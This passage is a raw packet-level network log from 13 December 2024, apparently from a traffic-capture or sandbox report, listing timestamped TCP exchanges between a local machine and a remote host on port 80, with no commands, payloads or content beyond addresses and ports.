                          Dec 13, 2024 17:54:40.341480017 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.341491938 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.341523886 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.342416048 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.342477083 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.342518091 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.342566967 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.461426973 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.461477041 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.461519957 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.461565971 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.465595007 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.465647936 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.465677977 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.465722084 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.533370972 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.533487082 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.533540964 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.533540964 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.537583113 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.537661076 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.537662983 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.537698030 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.546211958 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.546232939 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.546384096 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.554342985 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.554430962 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.554450989 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.554497957 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.562763929 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.562827110 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.562829018 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.562863111 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.571196079 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.571265936 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.571284056 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.571321964 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.579756021 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.579813957 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.579895973 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.579938889 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.588010073 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.588073969 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.588229895 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.588279009 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.596400023 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.596482992 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.596558094 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.596611023 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.604811907 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.604880095 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.604947090 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.604985952 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.612546921 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.612601995 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.612693071 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.612785101 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.620063066 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.620112896 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.725562096 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.725632906 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.725804090 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.725804090 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.727813959 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.727859974 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.727879047 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.727902889 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.732359886 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.732413054 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.732420921 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.732455015 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.736656904 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.736742020 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.736788988 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.736835003 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.741084099 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.741151094 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.741194963 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.741244078 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.745651007 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.745713949 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.745757103 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.745805025 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.750184059 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.750250101 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.750466108 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.750511885 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.754622936 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.754678965 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.754703999 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.754743099 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.759095907 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.759156942 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.759203911 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.759251118 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.763608932 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.763653040 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.763669968 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.763722897 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.768059969 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.768131018 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.768173933 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.768218040 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.772562027 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.772617102 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.772634983 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.772675991 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.777071953 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.777129889 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.777160883 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.777213097 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.781847000 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.781886101 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.781917095 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.781943083 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.786771059 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.786834955 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.786870003 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.786912918 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.790616035 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.790672064 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.790709019 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.790745974 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.795113087 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.795183897 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.795263052 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.795310974 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.799627066 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.799659967 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.799691916 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.799722910 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.804089069 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.804150105 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.804299116 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.804342031 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.808782101 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.808851957 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.808851957 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.808887959 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.813071012 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.813138008 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.813307047 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.813353062 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.817567110 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.817595005 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.817631960 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.817672968 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.822030067 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.822086096 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.917921066 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.918047905 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.918255091 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.918745041 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.918811083 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.918904066 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.918950081 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.922349930 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.922413111 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.922422886 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.922452927 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.925929070 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.925985098 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.926098108 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.926142931 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.929569006 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.929639101 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.929656029 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.929697037 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.933060884 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.933124065 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.933180094 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.933229923 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.936405897 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.936465025 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.936474085 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.936503887 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.939732075 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.939830065 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.939863920 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.939946890 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.943006992 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.943062067 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.943139076 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.943211079 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.946305990 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.946387053 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.946424007 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.946471930 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.949474096 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.949534893 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.949548960 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.949570894 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.952548027 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.952615023 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.952629089 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.952675104 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.955704927 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.955766916 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.955805063 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.955852032 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.958753109 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.958803892 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.958812952 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.958847046 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.961949110 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.962007046 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.962013960 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.962047100 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.965097904 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.965166092 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.965204954 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.965253115 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.968236923 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.968307018 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.968352079 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.968352079 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.971606970 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.971658945 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.971745968 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.971791029 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.974878073 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.974935055 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.974980116 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.975025892 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.977781057 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.977793932 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.977941990 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.980762005 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.980818987 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.980876923 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.980917931 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.983932972 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.984011889 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.984013081 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.984051943 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.987103939 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.987170935 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.987184048 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.987225056 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.990294933 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.990362883 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.990364075 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.990402937 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.993406057 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.993468046 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.993547916 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.993590117 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.996556997 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.996607065 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.996642113 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.996685028 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.040213108 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.040302992 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.040324926 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.040365934 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.041940928 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.041986942 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.041989088 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.042026043 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.045094967 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.045149088 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.045183897 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.045202971 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.048660994 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.048746109 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.048753977 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.048780918 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.053035021 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.053127050 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.053184032 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.053225040 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.056807995 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.056873083 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.056969881 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.057018042 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.110976934 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.111084938 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.111180067 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.111721039 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.111754894 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.111773014 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.111778975 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.111819983 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.114284992 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.114351988 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.114368916 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.114422083 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.116489887 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.116591930 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.116620064 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.116677046 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.119052887 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.119113922 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.119179964 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.119219065 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.121666908 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.121741056 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.121745110 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.121795893 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.124108076 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.124183893 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.124201059 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.124238968 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.126487017 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.126545906 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.126616001 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.126653910 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.128855944 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.128940105 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.128948927 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.128987074 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.132014036 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.132086992 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.132606983 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.132662058 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.134107113 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.134130001 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.134166002 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.134176016 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.136957884 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.136984110 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.137038946 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.137139082 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.138864040 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.138928890 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.139014959 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.139106035 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.141072989 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.141113043 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.141153097 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.141177893 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.143465042 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.143551111 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.143598080 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.143640995 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.145870924 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.145942926 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.146009922 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.146049023 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.148010015 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.148072958 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.148147106 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.148179054 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.150492907 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.150552034 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.150623083 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.150664091 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.152820110 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.152883053 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.152923107 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.152965069 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.155209064 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.155268908 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.155299902 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.155334949 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.157708883 CET8049161190.90.160.170192.168.2.22
